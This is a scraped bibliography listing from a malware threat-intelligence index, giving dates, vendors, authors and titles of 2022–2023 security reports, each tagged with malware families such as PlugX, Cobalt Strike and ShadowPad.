Jed ValderamaInvestigating the PlugX Trojan Disguised as a Legitimate Windows Debugger Tool PlugX
×Select Content2023-02-23
⋅
Bitdefender
⋅
Bitdefender Team,
Martin ZugecTechnical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966 Cobalt Strike
DarkComet
QuiteRAT
RATel
×Select Content2023-02-22
⋅
Symantec
⋅
Symantec Threat Hunter TeamHydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia Cobalt Strike
×Select Content2023-02-14
⋅
Cybereason
⋅
Cybereason Incident Response (IR) teamGootLoader - SEO Poisoning and Large Payloads Leading to Compromise GootLoader
Cobalt Strike
SystemBC
×Select Content2023-02-13
⋅
AhnLab
⋅
kingkimgimDalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign Godzilla Webshell
ASPXSpy
BlueShell
CHINACHOPPER
Cobalt Strike
Ladon
MimiKatz
Dalbit
×Select Content2023-02-13
⋅
Kroll
⋅
Laurie Iacono,
Stephen GreenRoyal Ransomware Deep Dive Cobalt Strike
Royal Ransom
×Select Content2023-02-08
⋅
Trend Micro
⋅
Ted LeeEarth Zhulong: Familiar Patterns Target Southeast Asian Firms Cobalt Strike
MACAMAX
1937CN
×Select Content2023-02-03
⋅
Mandiant
⋅
Genevieve Stark,
Kimberly GoodyFloat Like a Butterfly Sting Like a Bee BazarBackdoor
BumbleBee
Cobalt Strike
×Select Content2023-02-02
⋅
Kroll
⋅
Elio Biasiotto,
Stephen GreenHive Ransomware Technical Analysis and Initial Access Discovery BATLOADER
Cobalt Strike
Hive
×Select Content2023-02-02
⋅
Elastic
⋅
Andrew Pease,
Cyril François,
Devon Kerr,
Remco Sprooten,
Salim Bitam,
Seth GoodwinUpdate to the REF2924 intrusion set and related campaigns DoorMe
ShadowPad
SiestaGraph
×Select Content2023-02-02
⋅
EclecticIQ
⋅
EclecticIQ Threat Research TeamMustang Panda APT Group Uses European Commission-Themed Lure to Deliver PlugX Malware PlugX
×Select Content2023-01-30
⋅
Checkpoint
⋅
Arie OlshteinFollowing the Scent of TrickGate: 6-Year-Old Packer Used to Deploy the Most Wanted Malware Agent Tesla
Azorult
Buer
Cerber
Cobalt Strike
Emotet
Formbook
HawkEye Keylogger
Loki Password Stealer (PWS)
Maze
NetWire RC
Remcos
REvil
TrickBot
×Select Content2023-01-26
⋅
TEAMT5
⋅
Still HsuBrief History of MustangPanda and its PlugX Evolution PlugX
×Select Content2023-01-26
⋅
Palo Alto Networks Unit 42
⋅
Jen Miller-Osborn,
Mike HarbisonChinese PlugX Malware Hidden in Your USB Devices? PlugX
×Select Content2023-01-24
⋅
Fortinet
⋅
Geri RevayThe Year of the Wiper Azov Wiper
Bruh Wiper
CaddyWiper
Cobalt Strike
Vidar
×Select Content2023-01-23
⋅
Kroll
⋅
Elio Biasiotto,
Stephen GreenBlack Basta – Technical Analysis Black Basta
Cobalt Strike
MimiKatz
QakBot
SystemBC
×Select Content2023-01-16
⋅
Intrinsec
⋅
IntrinsecProxyNotShell – OWASSRF – Merry Xchange Cobalt Strike
SystemBC
×Select Content2023-01-09
⋅
kienmanowar Blog
⋅
m4n0w4r,
Tran Trung Kien[QuickNote] Another nice PlugX sample PlugX
×Select Content2023-01-05
⋅
Symantec
⋅
Threat Hunter TeamBluebottle: Campaign Hits Banks in French-speaking Countries in Africa CloudEyE
Cobalt Strike
MimiKatz
NetWire RC
POORTRY
Quasar RAT
BlueBottle
×Select Content2022-12-27
⋅
kienmanowar Blog
⋅
m4n0w4r,
Tran Trung KienDiving into a PlugX sample of Mustang Panda group PlugX
×Select Content2022-12-22
⋅
Recorded Future
⋅
Insikt GroupRedDelta Targets European Government Organizations and Continues to Iterate Custom PlugX Variant PlugX
RedDelta
×Select Content2022-12-15
⋅
Mandiant
⋅
MandiantTrojanized Windows 10 Operating System Installers Targeted Ukrainian Government Cobalt Strike
STOWAWAY
×Select Content2022-12-08
⋅
Cisco Talos
⋅
Tiago PereiraBreaking the silence - Recent Truebot activity Clop
Cobalt Strike
FlawedGrace
Raspberry Robin
Silence
Teleport
×Select Content2022-12-06
⋅
EuRepoC
⋅
Camille Borrett,
Kerstin Zettl-Schabath,
Lena RottingerConti/Wizard Spider BazarBackdoor
Cobalt Strike
Conti
Emotet
IcedID
Ryuk
TrickBot
WIZARD SPIDER
×Select Content2022-12-06
⋅
Blackberry
⋅
BlackBerry Research & Intelligence TeamMustang Panda Uses the Russian-Ukrainian War to Attack Europe and Asia Pacific Targets PlugX
×Select Content2022-12-02
⋅
Palo Alto Networks Unit 42
⋅
Bob Jung,
Dominik Reichel,
Esmid IdrizovicBlowing Cobalt Strike Out of the Water With Memory Analysis Cobalt Strike
×Select Content2022-12-02
⋅
Avast Decoded
⋅
Threat Intelligence TeamHitching a ride with Mustang Panda PlugX
×Select Content2022-11-30
⋅
⋅
FFRI Security
⋅
MatsumotoEvolution of the PlugX loader PlugX
Poison Ivy
×Select Content2022-11-15
⋅
SOC Prime
⋅
Veronika TelychkoSomnia Malware Detection: UAC-0118 aka FRwL Launches Cyber Attacks Against Organizations in Ukraine Using Enhanced Malware Strains Cobalt Strike
Vidar
UAC-0118
×Select Content2022-11-09
⋅
Trend Micro
⋅
Hara Hiroaki,
Ted LeeHack the Real Box: APT41’s New Subgroup Earth Longzhi Cobalt Strike
MimiKatz
Earth Longzhi
×Select Content2022-11-03
⋅
paloalto Netoworks: Unit42
⋅
Chris Navarrete,
Durgesh Sangvikar,
Matthew Tennis,
Siddhart Shibiraj,
Yanhui Jia,
Yu FuCobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild Cobalt Strike
×Select Content2022-11-03
⋅
Group-IB
⋅
Rustam MirkasymovFinancially motivated, dangerously activated: OPERA1ER APT in Africa Cobalt Strike
Common Raven
×Select Content2022-11-03
⋅
Github (chronicle)
⋅
ChronicleGCTI Open Source Detection Signatures Cobalt Strike
Sliver
×Select Content2022-10-31
⋅
Cynet
⋅
Max MalyutinOrion Threat Alert: Qakbot TTPs Arsenal and the Black Basta Ransomware Black Basta
Cobalt Strike
QakBot
×Select Content2022-10-25
⋅
VMware Threat Analysis Unit
⋅
Takahiro HaruyamaTracking the entire iceberg: long-term APT malware C2 protocol emulation and scanning ShadowPad
Winnti
×Select Content2022-10-13
⋅
Spamhaus
⋅
Spamhaus Malware LabsSpamhaus Botnet Threat Update Q3 2022 FluBot
Arkei Stealer
AsyncRAT
Ave Maria
BumbleBee
Cobalt Strike
DCRat
Dridex
Emotet
Loki Password Stealer (PWS)
Nanocore RAT
NetWire RC
NjRAT
QakBot
RecordBreaker
RedLine Stealer
Remcos
Socelars
Tofsee
Vjw0rm
×Select Content2022-10-13
⋅
Microsoft
⋅
Microsoft Threat Hunting,
MSRC TeamHunting for Cobalt Strike: Mining and plotting for fun and profit Cobalt Strike
×Select Content2022-10-12
⋅
Trend Micro
⋅
Ian Kenefick,
Lucas Silva,
Nicole HernandezBlack Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike Black Basta
Brute Ratel C4
Cobalt Strike
QakBot
×Select Content2022-10-06
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamMustang Panda Abuses Legitimate Apps to Target Myanmar Based Victims PlugX
×Select Content2022-10-03
⋅
Check Point
⋅
Marc Salinas FernandezBumblebee: increasing its capacity and evolving its TTPs BumbleBee
Cobalt Strike
Meterpreter
Sliver
Vidar
×Select Content2022-10-03
⋅
Trend Micro
⋅
Jaromír Hořejší,
Joseph ChenWater Labbu Abuses Malicious DApps to Steal Cryptocurrency Cobalt Strike
Water Labbu
×Select Content2022-09-30
⋅
NCC Group
⋅
Michael Mullen,
Nikolaos Pantazopoulos,
William BackhouseA glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion ShadowPad
×Select Content2022-09-29
⋅
Symantec
⋅
Threat Hunter TeamWitchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East CHINACHOPPER
Lookback
MimiKatz
PlugX
Unidentified 096 (Keylogger)
x4
Witchetty
×Select Content2022-09-26
⋅
Palo Alto Networks Unit 42
⋅
Daniela Shalev,
Itay GamlielHunting for Unsigned DLLs to Find APTs PlugX
Raspberry Robin
Roshtyak
×Select Content2022-09-26
⋅
The DFIR Report
⋅
The DFIR ReportBumbleBee: Round Two BumbleBee
Cobalt Strike
Meterpreter
×Select Content2022-09-25
⋅
YouTube (Arda Büyükkaya)
⋅
Arda BüyükkayaCobalt Strike Shellcode Loader With Rust (YouTube) Cobalt Strike
×Select Content2022-09-19
⋅
Virus Bulletin
⋅
Takahiro HaruyamaTracking the entire iceberg - long-term APT malware C2 protocol emulation and scanning ShadowPad
Winnti
×Select Content2022-09-14
⋅
Security Joes
⋅
Felipe DuarteDissecting PlugX to Extract Its Crown Jewels PlugX
×Select Content2022-09-13
⋅
Symantec
⋅
Threat Hunter TeamNew Wave of Espionage Activity Targets Asian Governments MimiKatz
PlugX
Quasar RAT
ShadowPad
Trochilus RAT
×Select Content2022-09-13
⋅
AdvIntel
⋅
Advanced IntelligenceAdvIntel's State of Emotet aka "SpmTools" Displays Over Million Compromised Machines Through 2022 Conti
Cobalt Strike
Emotet
Ryuk
TrickBot
×Select Content2022-09-12
⋅
The DFIR Report
⋅
The DFIR ReportDead or Alive? An Emotet Story Cobalt Strike
Emotet
×Select Content2022-09-09
⋅
Github (m4now4r)
⋅
m4n0w4r“Mustang Panda” – Enemy at the gate PlugX
×Select Content2022-09-08
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamBRONZE PRESIDENT Targets Government Officials PlugX
×Select Content2022-09-08
⋅
Cybereason
⋅
Aleksandar Milenkoski,
Kotaro Ogino,
Yuki ShibuyaThreat Analysis Report: PlugX RAT Loader Evolution PlugX
×Select Content2022-09-07
⋅
⋅
Google Threat Analysis Group,
Pierre-Marc BureauInitial access broker repurposing techniques in targeted attacks against Ukraine AnchorMail
Cobalt Strike
IcedID
×Select Content2022-09-07
⋅
cyble
⋅
CybleBumblebee Returns With New Infection Technique BumbleBee
Cobalt Strike
×Select Content2022-09-06
⋅
ESET Research
⋅
Thibaut PassillyWorok: The big picture MimiKatz
PNGLoad
reGeorg
ShadowPad
Worok
×Select Content2022-09-06
⋅
⋅
INCIBE-CERT
⋅
INCIBEEstudio del análisis de Nobelium BEATDROP
BOOMBOX
Cobalt Strike
EnvyScout
Unidentified 099 (APT29 Dropbox Loader)
VaporRage
×Select Content2022-09-06
⋅
CISA
⋅
CISA,
FBI,
MS-ISAC,
US-CERTAlert (AA22-249A) #StopRansomware: Vice Society Cobalt Strike
Empire Downloader
FiveHands
HelloKitty
SystemBC
Zeppelin
×Select Content2022-09-06
⋅
Didier Stevens
⋅
Didier StevensAn Obfuscated Beacon – Extra XOR Layer Cobalt Strike
×Select Content2022-09-06
⋅
cocomelonc
⋅
cocomeloncMalware development tricks: parent PID spoofing. Simple C++ example. Cobalt Strike
Konni
×Select Content2022-09-01
⋅
Medium michaelkoczwara
⋅
Michael KoczwaraHunting C2/Adversaries Infrastructure with Shodan and Censys Brute Ratel C4
Cobalt Strike
Deimos
GRUNT
IcedID
Merlin
Meterpreter
Nighthawk
PoshC2
Sliver
×Select Content2022-09-01
⋅
Trend Micro
⋅
Trend MicroRansomware Spotlight Black Basta Black Basta
Cobalt Strike
MimiKatz
QakBot
×Select Content2022-08-30
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)Hacker Infrastructure Used in Cisco Breach Discovered Attacking a Top Workforce Management Corporation & an Affiliate of Russia’s Evil Corp Gang Suspected, Reports eSentire Cobalt Strike
FiveHands
UNC2447
×Select Content2022-08-25
⋅
SentinelOne
⋅
Jim WalterBlueSky Ransomware | AD Lateral Movement, Evasion and Fast Encryption Put Threat on the Radar BlueSky
Cobalt Strike
JuicyPotato
×Select Content2022-08-22
⋅
Microsoft
⋅
MicrosoftExtortion Economics - Ransomware’s new business model BlackCat
Conti
Hive
REvil
AgendaCrypt
Black Basta
BlackCat
Brute Ratel C4
Cobalt Strike
Conti
Hive
Mount Locker
Nokoyawa Ransomware
REvil
Ryuk
×Select Content2022-08-19
⋅
nccgroup
⋅
Ross InmanBack in Black: Unlocking a LockBit 3.0 Ransomware Attack FAKEUPDATES
Cobalt Strike
LockBit
×Select Content2022-08-18
⋅
⋅
NSFOCUS
⋅
NSFOCUSNew APT group MURENSHARK investigative report: Torpedoes hit Turkish Navy Cobalt Strike
×Select Content2022-08-18
⋅
Group-IB
⋅
Nikita RostovtsevAPT41 World Tour 2021 on a tight schedule Cobalt Strike
×Select Content2022-08-18
⋅
Sophos
⋅
Sean GallagherCookie stealing: the new perimeter bypass Cobalt Strike
Meterpreter
MimiKatz
Phoenix Keylogger
Quasar RAT
×Select Content2022-08-18
⋅
Trustwave
⋅
Pawel KnapczykOverview of the Cyber Weapons Used in the Ukraine - Russia War AcidRain
CaddyWiper
Cobalt Strike
CredoMap
DCRat
DoubleZero
GraphSteel
GrimPlant
HermeticWiper
INDUSTROYER2
InvisiMole
IsaacWiper
PartyTicket
2022-08-17 ⋅ Cybereason ⋅ Cybereason Global SOC Team ⋅ Bumblebee Loader – The High Road to Enterprise Domain Control ⋅ BumbleBee, Cobalt Strike
2022-08-17 ⋅ Secureworks ⋅ Counter Threat Unit Research Team ⋅ DarkTortilla Malware Analysis ⋅ Agent Tesla, AsyncRAT, Cobalt Strike, DarkTortilla, Nanocore RAT, RedLine Stealer
2022-08-12 ⋅ SANS ISC ⋅ Brad Duncan ⋅ Monster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC and Cobalt Strike ⋅ Cobalt Strike, DarkVNC, IcedID
2022-08-11 ⋅ Malcat ⋅ malcat team ⋅ LNK forensic and config extraction of a cobalt strike beacon ⋅ Cobalt Strike
2022-08-11 ⋅ SecurityScorecard ⋅ Robert Ames ⋅ The Increase in Ransomware Attacks on Local Governments ⋅ BlackCat, BlackCat, Cobalt Strike, LockBit
2022-08-10 ⋅ Weixin ⋅ Red Raindrop Team ⋅ Operation(верность) mercenary: a torrent of steel trapped in the plains of Eastern Europe ⋅ BumbleBee, Cobalt Strike
2022-08-08 ⋅ The DFIR Report ⋅ The DFIR Report ⋅ BumbleBee Roasts Its Way to Domain Admin ⋅ BumbleBee, Cobalt Strike
2022-08-04 ⋅ YouTube (Arda Büyükkaya) ⋅ Arda Büyükkaya ⋅ LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool ⋅ Cobalt Strike, LockBit
2022-08-03 ⋅ Palo Alto Networks Unit 42 ⋅ Brad Duncan ⋅ Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware ⋅ BazarBackdoor, BumbleBee, Cobalt Strike, Conti
2022-08-02 ⋅ Cisco Talos ⋅ Asheer Malhotra, Vitor Ventura ⋅ Manjusaka: A Chinese sibling of Sliver and Cobalt Strike ⋅ Manjusaka, Cobalt Strike, Manjusaka
2022-07-30 ⋅ cocomelonc ⋅ Malware AV evasion - part 8. Encode payload via Z85 ⋅ Agent Tesla, Carbanak, Carberp, Cardinal RAT, Cobalt Strike, donut_injector
2022-07-28 ⋅ SentinelOne ⋅ James Haughom, Julien Reisdorffer, Júlio Dantas ⋅ Living Off Windows Defender | LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool ⋅ Cobalt Strike, LockBit
2022-07-27 ⋅ ReversingLabs ⋅ Joseph Edwards ⋅ Threat analysis: Follina exploit fuels 'live-off-the-land' attacks ⋅ Cobalt Strike, MimiKatz
2022-07-27 ⋅ cyble ⋅ Cyble Research Labs ⋅ Targeted Attacks Being Carried Out Via DLL SideLoading ⋅ Cobalt Strike, QakBot
2022-07-27 ⋅ Trend Micro ⋅ Buddy Tancio, Jed Valderama ⋅ Gootkit Loader’s Updated Tactics and Fileless Delivery of Cobalt Strike ⋅ Cobalt Strike, GootKit, Kronos, REvil, SunCrypt
2022-07-26 ⋅ Microsoft ⋅ Microsoft 365 Defender Research Team ⋅ Malicious IIS extensions quietly open persistent backdoors into servers ⋅ CHINACHOPPER, MimiKatz
2022-07-22 ⋅ Binary Ninja ⋅ Xusheng Li ⋅ Reverse Engineering a Cobalt Strike Dropper With Binary Ninja ⋅ Cobalt Strike
2022-07-20 ⋅ NVISO Labs ⋅ Sasja Reynaert ⋅ Analysis of a trojanized jQuery script: GootLoader unleashed ⋅ GootLoader, Cobalt Strike
2022-07-20 ⋅ U.S. Cyber Command ⋅ Cyber National Mission Force Public Affairs ⋅ Cyber National Mission Force discloses IOCs from Ukrainian networks ⋅ Cobalt Strike, GraphSteel, GrimPlant, MicroBackdoor
2022-07-20 ⋅ Advanced Intelligence ⋅ Marley Smith, Vitali Kremez, Yelisey Boguslavskiy ⋅ Anatomy of Attack: Truth Behind the Costa Rica Government Ransomware 5-Day Intrusion ⋅ Cobalt Strike
2022-07-20 ⋅ Mandiant ⋅ Mandiant Threat Intelligence ⋅ Evacuation and Humanitarian Documents used to Spear Phish Ukrainian Entities ⋅ Cobalt Strike, GraphSteel, GrimPlant, MicroBackdoor
2022-07-19 ⋅ Palo Alto Networks Unit 42 ⋅ Mike Harbison, Peter Renals ⋅ Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive ⋅ Cobalt Strike, EnvyScout, Gdrive
2022-07-18 ⋅ Palo Alto Networks Unit 42 ⋅ Unit 42 ⋅ Obscure Serpens ⋅ Cobalt Strike, Empire Downloader, Meterpreter, MimiKatz, DarkHydrus
2022-07-18 ⋅ YouTube (Security Joes) ⋅ Felipe Duarte ⋅ PlugX DLL Side-Loading Technique ⋅ PlugX
2022-07-18 ⋅ Palo Alto Networks Unit 42 ⋅ Unit 42 ⋅ Shallow Taurus ⋅ FormerFirstRAT, IsSpace, NewCT, PlugX, Poison Ivy, Tidepool, DragonOK
2022-07-18 ⋅ Censys ⋅ Censys ⋅ Russian Ransomware C2 Network Discovered in Censys Data ⋅ Cobalt Strike, DeimosC2, MimiKatz, PoshC2
2022-07-18 ⋅ Palo Alto Networks Unit 42 ⋅ Unit 42 ⋅ Iron Taurus ⋅ CHINACHOPPER, Ghost RAT, Wonknu, ZXShell, APT27
2022-07-13 ⋅ Malwarebytes Labs ⋅ Hossein Jazi, Roberto Santos ⋅ Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign ⋅ Cobalt Strike
2022-07-13 ⋅ Palo Alto Networks Unit 42 ⋅ Chris Navarrete, Durgesh Sangvikar, Siddhart Shibiraj, Yanhui Jia, Yu Fu ⋅ Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption ⋅ Cobalt Strike
2022-07-11 ⋅ Cert-UA ⋅ Cert-UA ⋅ UAC-0056 attack on Ukrainian state organizations using Cobalt Strike Beacon (CERT-UA#4941) ⋅ Cobalt Strike
2022-07-07 ⋅ SANS ISC ⋅ Brad Duncan ⋅ Emotet infection with Cobalt Strike ⋅ Cobalt Strike, Emotet
2022-07-07 ⋅ IBM ⋅ Charlotte Hammond, Kat Weinberger, Ole Villadsen ⋅ Unprecedented Shift: The Trickbot Group is Systematically Attacking Ukraine ⋅ AnchorMail, BumbleBee, Cobalt Strike, IcedID, Meterpreter
2022-07-06 ⋅ Cert-UA ⋅ Cert-UA ⋅ UAC-0056 cyberattack on Ukrainian state organizations using Cobalt Strike Beacon (CERT-UA#4914) ⋅ Cobalt Strike
2022-07-01 ⋅ RiskIQ ⋅ RiskIQ ⋅ ToddyCat: A Guided Journey through the Attacker's Infrastructure ⋅ ShadowPad, ToddyCat
2022-06-30 ⋅ Trend Micro ⋅ Emmanuel Panopio, James Panlilio, John Kenneth Reyes, Kenneth Adrian Apostol, Melvin Singwa, Mirah Manlapig, Paolo Ronniel Labrador ⋅ Black Basta Ransomware Operators Expand Their Attack Arsenal With QakBot Trojan and PrintNightmare Exploit ⋅ Black Basta, Cobalt Strike, QakBot
2022-06-28 ⋅ Lumen ⋅ Black Lotus Labs ⋅ ZuoRAT Hijacks SOHO Routers To Silently Stalk Networks ⋅ ZuoRAT, Cobalt Strike
2022-06-27 ⋅ Kaspersky ICS CERT ⋅ Artem Snegirev, Kirill Kruglov ⋅ Attacks on industrial control systems using ShadowPad ⋅ Cobalt Strike, PlugX, ShadowPad
2022-06-26 ⋅ BushidoToken ⋅ Overview of Russian GRU and SVR Cyberespionage Campaigns 1H 2022 ⋅ Cobalt Strike, CredoMap, EnvyScout
2022-06-23 ⋅ cyble ⋅ Cyble Research Labs ⋅ Matanbuchus Loader Resurfaces ⋅ Cobalt Strike, Matanbuchus
2022-06-23 ⋅ Secureworks ⋅ Counter Threat Unit Research Team ⋅ BRONZE STARLIGHT Ransomware Operations Use HUI Loader ⋅ ATOMSILO, Cobalt Strike, HUI Loader, LockFile, NightSky, Pandora, PlugX, Quasar RAT, Rook, SodaMaster, BRONZE STARLIGHT
2022-06-21 ⋅ Cisco Talos ⋅ Chris Neal, Flavio Costa, Guilherme Venere ⋅ Avos ransomware group expands with new attack arsenal ⋅ AvosLocker, Cobalt Strike, DarkComet, MimiKatz
2022-06-20 ⋅ Cert-UA ⋅ Cert-UA ⋅ UAC-0098 group cyberattack on critical infrastructure of Ukraine (CERT-UA#4842) ⋅ Cobalt Strike
2022-06-17 ⋅ SANS ISC ⋅ Brad Duncan ⋅ Malspam pushes Matanbuchus malware, leads to Cobalt Strike ⋅ Cobalt Strike, Matanbuchus
2022-06-15 ⋅ Security Joes ⋅ Charles Lomboni, Felipe Duarte, Venkat Rajgor ⋅ Backdoor via XFF: Mysterious Threat Actor Under Radar ⋅ CHINACHOPPER
2022-06-11 ⋅ Twitter (@MsftSecIntel) ⋅ Microsoft Threat Intelligence ⋅ Tweet on DEV-0401, DEV-0234 exploiting Confluence RCE CVE-2022-26134 ⋅ Kinsing, Mirai, Cobalt Strike
2022-06-07 ⋅ AdvIntel ⋅ Marley Smith, Vitali Kremez, Yelisey Boguslavskiy ⋅ BlackCat — In a Shifting Threat Landscape, It Helps to Land on Your Feet: Tech Dive ⋅ BlackCat, BlackCat, Cobalt Strike
2022-06-07 ⋅ cyble ⋅ Cyble ⋅ Bumblebee Loader on The Rise ⋅ BumbleBee, Cobalt Strike
2022-06-06 ⋅ Trellix ⋅ Trellix ⋅ Growling Bears Make Thunderous Noise ⋅ Cobalt Strike, HermeticWiper, WhisperGate, NB65
2022-06-04 ⋅ kienmanowar Blog ⋅ m4n0w4r, Tran Trung Kien ⋅ [QuickNote] CobaltStrike SMB Beacon Analysis ⋅ Cobalt Strike
2022-06-03 ⋅ AttackIQ ⋅ AttackIQ Adversary Research Team, Jackson Wells ⋅ Attack Graph Response to US CERT AA22-152A: Karakurt Data Extortion Group ⋅ Cobalt Strike, MimiKatz
2022-06-02 ⋅ Mandiant ⋅ Mandiant ⋅ TRENDING EVIL Q2 2022 ⋅ CloudEyE, Cobalt Strike, CryptBot, Emotet, IsaacWiper, QakBot
2022-06-02 ⋅ Mandiant ⋅ Mandiant Intelligence ⋅ To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions ⋅ FAKEUPDATES, Blister, Cobalt Strike, DoppelPaymer, Dridex, FriedEx, Hades, LockBit, Macaw, MimiKatz, Phoenix Locker, WastedLocker
2022-06-01 ⋅ Elastic ⋅ Andrew Pease, Daniel Stepanic, Derek Ditch, Salim Bitam, Seth Goodwin ⋅ CUBA Ransomware Campaign Analysis ⋅ Cobalt Strike, Cuba, Meterpreter, MimiKatz, SystemBC
2022-05-27 ⋅ PTSecurity ⋅ Aleksey Vishnyakov, Anton Belousov ⋅ How bootkits are implemented in modern firmware and how UEFI differs from Legacy BIOS ⋅ LoJax, MoonBounce
2022-05-25 ⋅ Medium walmartglobaltech ⋅ Jason Reaves, Joshua Platt ⋅ SocGholish Campaigns and Initial Access Kit ⋅ FAKEUPDATES, Blister, Cobalt Strike, NetSupportManager RAT
2022-05-24 ⋅ BitSight ⋅ BitSight, João Batista, Pedro Umbelino ⋅ Emotet Botnet Rises Again ⋅ Cobalt Strike, Emotet, QakBot, SystemBC
2022-05-24 ⋅ The Hacker News ⋅ Florian Goutin ⋅ Malware Analysis: Trickbot ⋅ Cobalt Strike, Conti, Ryuk, TrickBot
2022-05-23 ⋅ Trend Micro ⋅ Daniel Lunghi, Jaromír Hořejší ⋅ Operation Earth Berberoka ⋅ reptile, oRAT, Ghost RAT, PlugX, pupy, Earth Berberoka
2022-05-22 ⋅ R136a1 ⋅ Dominik Reichel ⋅ Introduction of a PE file extractor for various situations ⋅ Cobalt Strike, Matanbuchus
2022-05-20 ⋅ sonatype ⋅ Ax Sharma ⋅ New 'pymafka' malicious package drops Cobalt Strike on macOS, Windows, Linux ⋅ Cobalt Strike
2022-05-20 ⋅ VinCSS ⋅ Dang Dinh Phuong, m4n0w4r, Tran Trung Kien ⋅ [RE027] China-based APT Mustang Panda might have still continued their attack activities against organizations in Vietnam ⋅ PlugX
2022-05-20 ⋅ Cybleinc ⋅ Cyble ⋅ Malware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof Of Concept To Deliver Cobalt-Strike Beacon ⋅ Cobalt Strike
2022-05-20 ⋅ AhnLab ⋅ ASEC ⋅ Why Remediation Alone Is Not Enough When Infected by Malware ⋅ Cobalt Strike, DarkSide
2022-05-19 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan ⋅ Bumblebee Malware from TransferXL URLs ⋅ BumbleBee, Cobalt Strike
2022-05-18 ⋅ PRODAFT Threat Intelligence ⋅ PRODAFT ⋅ Wizard Spider In-Depth Analysis ⋅ Cobalt Strike, Conti, WIZARD SPIDER
2022-05-17 ⋅ Trend Micro ⋅ Trend Micro Research ⋅ Ransomware Spotlight: RansomEXX ⋅ LaZagne, Cobalt Strike, IcedID, MimiKatz, PyXie, RansomEXX, TrickBot
2022-05-17 ⋅ Positive Technologies ⋅ Positive Technologies ⋅ Space Pirates: analyzing the tools and connections of a new hacker group ⋅ FormerFirstRAT, PlugX, Poison Ivy, Rovnix, ShadowPad, Zupdax
2022-05-16 ⋅ JPCERT/CC ⋅ Shusei Tomonaga ⋅ Analysis of HUI Loader ⋅ HUI Loader, PlugX, Poison Ivy, Quasar RAT
2022-05-12 ⋅ Intel 471 ⋅ Intel 471 ⋅ What malware to look for if you want to prevent a ransomware attack ⋅ Conti, BumbleBee, Cobalt Strike, IcedID, Sliver
2022-05-12 ⋅ Red Canary ⋅ Lauren Podber, Tony Lambert ⋅ The Goot cause: Detecting Gootloader and its follow-on activity ⋅ GootLoader, Cobalt Strike
2022-05-12 ⋅ Red Canary ⋅ Lauren Podber, Tony Lambert ⋅ Gootloader and Cobalt Strike malware analysis ⋅ GootLoader, Cobalt Strike
2022-05-12 ⋅ TEAMT5 ⋅ Leon Chang, Silvia Yeh ⋅ The Next Gen PlugX/ShadowPad? A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT (slides) ⋅ KEYPLUG, Cobalt Strike, CROSSWALK, FunnySwitch, PlugX, ShadowPad, Winnti, SLIME29, TianWu
2022-05-11 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan ⋅ TA578 using thread-hijacked emails to push ISO files for Bumblebee malware ⋅ BumbleBee, Cobalt Strike, IcedID, PhotoLoader
2022-05-11 ⋅ NTT ⋅ Ryu Hiyoshi ⋅ Operation RestyLink: Targeted attack campaign targeting Japanese companies ⋅ Cobalt Strike
2022-05-10 ⋅ Marco Ramilli's Blog ⋅ Marco Ramilli ⋅ A Malware Analysis in RU-AU conflict ⋅ Cobalt Strike
2022-05-09 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team, Microsoft Threat Intelligence Center (MSTIC) ⋅ Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself ⋅ AnchorDNS, BlackCat, BlackMatter, Conti, DarkSide, HelloKitty, Hive, LockBit, REvil, FAKEUPDATES, Griffon, ATOMSILO, BazarBackdoor, BlackCat, BlackMatter, Blister, Cobalt Strike, Conti, DarkSide, Emotet, FiveHands, Gozi, HelloKitty, Hive, IcedID, ISFB, JSSLoader, LockBit, LockFile, Maze, NightSky, Pandora, Phobos, Phoenix Locker, PhotoLoader, QakBot, REvil, Rook, Ryuk, SystemBC, TrickBot, WastedLocker, BRONZE STARLIGHT
2022-05-09 ⋅ cocomelonc ⋅ cocomelonc ⋅ Malware development: persistence - part 4. Windows services. Simple C++ example. ⋅ Anchor, AppleJeus, Attor, BBSRAT, BlackEnergy, Carbanak, Cobalt Strike, DuQu
2022-05-09 ⋅ Qianxin Threat Intelligence Center ⋅ Red Raindrops Team ⋅ Operation EviLoong: An electronic party of "borderless" hackers ⋅ ZXShell
2022-05-09 ⋅ TEAMT5 ⋅ TeamT5 ⋅ Hiding in Plain Sight: Obscuring C2s by Abusing CDN Services ⋅ Cobalt Strike
2022-05-09 ⋅ The DFIR Report ⋅ The DFIR Report ⋅ SEO Poisoning – A Gootloader Story ⋅ GootLoader, LaZagne, Cobalt Strike, GootKit
2022-05-08 ⋅ IronNet ⋅ Brent Eskridge, Joey Fitzpatrick, Michael Leardi ⋅ Tracking Cobalt Strike Servers Used in Cyberattacks on Ukraine ⋅ Cobalt Strike
2022-05-06 ⋅ Twitter (@MsftSecIntel) ⋅ Microsoft Security Intelligence ⋅ Twitter Thread on initial infection of SocGholish/FAKEUPDATES campaigns lead to BLISTER Loader, CobaltStrike, Lockbit and followed by Hands On Keyboard activity ⋅ FAKEUPDATES, Blister, Cobalt Strike, LockBit
2022-05-06 ⋅ Palo Alto Networks Unit 42 ⋅ Chris Navarrete, Durgesh Sangvikar, Siddhart Shibiraj, Yanhui Jia, Yu Fu ⋅ Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding ⋅ Cobalt Strike
